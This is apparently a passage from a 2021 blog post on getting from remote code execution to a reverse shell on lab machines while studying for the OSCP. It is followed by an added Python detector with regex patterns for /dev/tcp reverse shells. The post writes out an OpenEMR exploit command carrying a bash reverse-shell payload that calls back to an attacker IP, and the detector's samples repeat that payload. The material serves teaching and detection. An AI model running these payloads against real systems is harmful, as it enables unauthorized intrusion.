🖥️️ RCE to Shell Techniques 🐚

Robert Scocca
5 min read · Jan 26, 2021

You have Remote Code Execution on a vulnerable machine, but how do you get a shell?

While hacking vulnerable machines, you’ll find neat exploits that give you a shell on the target automatically. However, most exploits merely give Remote Code Execution (RCE), which then has to be used to execute further commands on the target to get a shell connection. This isn’t always straightforward, and involves a lot of trial and error: testing different reverse shell payloads and trying different techniques…

In this post, I’ve documented all the techniques I’ve found in going from RCE to shell for Linux and Windows machines. I’ve found these techniques while preparing for the OSCP exam, on ethical hacking lab platforms including Hack the Box, TryHackMe, Proving Grounds, and Pentesting with Kali Linux (PWK) Labs.

Linux

Shellgen

For finding commands that launch reverse shells from an RCE exploit on Linux targets, I always use this script. Shellgen is great because it covers just about every payload you’ll find in cheatsheets on the internet.

You can enter your IP manually into the script or select it by network interface, then specify the desired port. It then gives you the option to generate a command in your desired scripting language, which you can copy and paste into your RCE vector. Here’s an example of how to use it:

bash shellgen.sh tun0 80

Here I used a similar bash payload with OpenEMR < 5.0.1 — (Authenticated) Remote Code Execution in the retired Hack the Box Cache machine:

python 45161.py http://hms.htb/ -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.14/1337 0>&1'

Works like a charm.
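Seen from the defender's side, the bash payload quoted above has a recognisable shape in process-creation telemetry: an interactive shell whose descriptors are duplicated onto a `/dev/tcp` socket. The following is an added example, not part of the original post or of Shellgen. It assumes full command lines are logged, and the record layout, the function names and the sample records are all constructed for illustration.

```python
import re

# bash's pseudo-device for opening a socket: /dev/tcp/<host>/<port> (or /dev/udp)
DEV_NET = re.compile(r"/dev/(tcp|udp)/([\w.\-:]+)/(\d{1,5})")
# Interactive shell flag such as "bash -i" or "sh -x -i" (does not match "ssh -i")
INTERACTIVE = re.compile(r"\b(?:ba|da|z|k)?sh\s+(?:-\w+\s+)*-\w*i")
# Descriptor duplication onto the socket: "0>&1", "2>&1", ">& /dev/..."
FD_DUP = re.compile(r"\d*[<>]&\s*\d+|[<>]&\s*/dev/")

def classify(cmdline):
    """Return None, or a finding dict for a command line that opens /dev/tcp|udp."""
    m = DEV_NET.search(cmdline)
    if not m:
        return None
    interactive = bool(INTERACTIVE.search(cmdline))
    fd_dup = bool(FD_DUP.search(cmdline))
    # Interactive shell + descriptors tied to the socket is the reverse-shell
    # shape; a bare /dev/tcp open is often an admin port probe, so only "review".
    severity = "high" if interactive and fd_dup else "review"
    return {"proto": m.group(1), "host": m.group(2),
            "port": int(m.group(3)), "severity": severity}

def scan(records):
    """records: iterable of (src_host, user, cmdline). Returns a list of findings."""
    findings = []
    for src_host, user, cmdline in records:
        hit = classify(cmdline)
        if hit:
            findings.append({"src_host": src_host, "user": user, **hit})
    return findings

# Constructed sample records (not real logs); the first two reuse the payload
# string shown in the post, the rest are benign look-alikes.
SAMPLE = [
    ("web01", "www-data", "bash -i >& /dev/tcp/10.10.14.14/1337 0>&1"),
    ("web01", "www-data", "sh -c bash -i >& /dev/tcp/10.10.14.14/1337 0>&1"),
    ("db-proxy", "root", "timeout 1 bash -c '</dev/tcp/db01/5432'"),
    ("web01", "deploy", "bash -c 'echo hi'"),
    ("ops01", "alice", "ssh -i key.pem deploy@web01"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A web-server account such as `www-data` spawning a "high" match is the case worth alerting on; the "review" tier exists because `/dev/tcp` is also a common port-check idiom in admin scripts.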

It’s important to note that some vulnerable machines have some kind of firewall…